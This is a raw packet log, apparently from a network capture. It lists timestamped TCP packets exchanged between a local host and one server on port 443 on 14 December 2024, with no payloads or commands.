Dec 14, 2024 14:00:21.723345995 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.723355055 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.723392963 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.735430956 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.735457897 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.735568047 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.735577106 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.735618114 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.745973110 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.745992899 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.746084929 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.746094942 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.746139050 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.757324934 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.757353067 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.757462025 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.757472992 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.757517099 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.767153978 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.767174959 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.767245054 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.767251968 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.767287970 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.883146048 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.883176088 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.883476973 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.883543968 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.883630991 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.889556885 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.889583111 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.889662981 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.889684916 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.889714003 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.889733076 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.897376060 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.897401094 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.897538900 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.897553921 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.897610903 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.904797077 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.904824972 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.904973030 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.904984951 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.905049086 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.912379026 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.912405014 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.912518024 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.912533045 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.912589073 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.919429064 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.919456005 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.919547081 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.919553995 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.919620037 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.925904989 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.925955057 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.926013947 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.926042080 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.926057100 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.926083088 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.954149961 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.954204082 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.954314947 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.954344034 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:21.954359055 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:21.954380989 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.080831051 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.080866098 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.080914021 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.080945015 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.080961943 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.080980062 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.086472988 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.086540937 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.086560011 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.086580992 CET    443    49711    151.101.193.137    192.168.2.12
Dec 14, 2024 14:00:22.086595058 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.086606026 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.086754084 CET    49711    443    192.168.2.12    151.101.193.137
Dec 14, 2024 14:00:22.093894958 CET    443    49711    151.101.193.137    192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.093919992 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.093980074 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.093995094 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.094017029 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.094038010 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.101317883 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.101352930 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.101444960 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.101444960 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.101461887 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.101500988 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.108863115 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.108903885 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.108935118 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.108963966 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.108979940 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.109010935 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.115854979 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.115890980 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.115931034 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.115957975 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.115977049 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.115997076 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.122370958 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.122405052 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.122474909 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.122507095 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.122524977 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.122549057 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.146002054 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.146034002 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.146155119 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.146188974 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.146243095 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.272459984 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.272499084 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.272646904 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.272676945 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.272726059 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.279412985 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.279448986 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.279567003 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.279591084 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.279609919 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.279697895 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.285890102 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.285919905 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.286036015 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.286048889 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.286093950 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.293309927 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.293342113 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.293395996 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.293409109 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.293433905 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.293450117 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.300817013 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.300837994 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.300971985 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.300981045 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.301021099 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.307785034 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.307806969 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.307915926 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.307924986 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.307962894 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.315396070 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.315427065 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.315646887 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.315674067 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.315764904 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.338011026 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.338037014 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.338165045 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.338187933 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.338237047 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.464715958 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.464755058 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.464900970 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.464926004 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.464972019 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.471628904 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.471702099 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.471734047 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.471744061 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.471771002 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.471786022 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.478156090 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.478209972 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.478286028 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.478296041 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.478311062 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.478332043 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.485631943 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.485687971 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.485754967 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.485764027 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.485781908 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.485810995 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.493036985 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.493100882 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.493175030 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.493201017 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.493222952 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.493237019 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.500135899 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.500180960 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.500250101 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.500272036 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.500286102 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.500310898 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.507500887 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.507550001 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.507613897 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.507635117 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.507652044 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.507671118 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.542552948 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.542587042 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.542726994 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.542754889 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.542793036 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.656666040 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.656692982 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.656861067 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.656881094 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.656920910 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.663491011 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.663517952 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.663592100 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.663604021 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:22.663619995 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.663638115 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:22.671303988 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.425404072 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.432462931 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.432496071 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.432548046 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.432573080 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.432595015 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.432622910 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.439127922 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.439161062 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.439222097 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.439248085 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.439264059 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.439284086 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.446527958 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.446558952 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.446621895 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.446650028 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.446691990 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.453988075 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.454013109 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.454123020 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.454149961 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.454194069 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.460901976 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.460930109 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.460985899 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.461009979 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.461057901 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.468394995 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.468426943 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.468482971 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.468506098 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.468525887 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.468544960 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.502990007 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.503021002 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.503081083 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.503108025 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.503133059 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.503148079 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.617423058 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.617433071 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.617535114 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.617563009 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.617613077 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.624195099 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.624229908 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.624335051 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.624355078 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.624409914 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.631547928 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.631582022 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.631660938 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.631685972 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.631732941 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.639153004 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.639182091 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.639246941 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.639270067 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.639322996 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.645668030 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.645695925 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.645752907 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.645775080 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.645812035 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.653590918 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.653620005 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.653666973 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.653692961 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.653708935 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.653737068 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.660135031 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.660161018 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.660227060 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.660252094 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.660289049 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.695946932 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.695988894 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.696144104 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.696171999 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.696248055 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.809600115 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.809629917 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.809717894 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.809746981 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.809789896 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.816417933 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.816448927 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.816534996 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.816560984 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.816612005 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.824429989 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.824471951 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.824532032 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.824559927 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.824574947 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.824596882 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.831979036 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.832024097 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.832086086 CET49711443192.168.2.12151.101.193.137
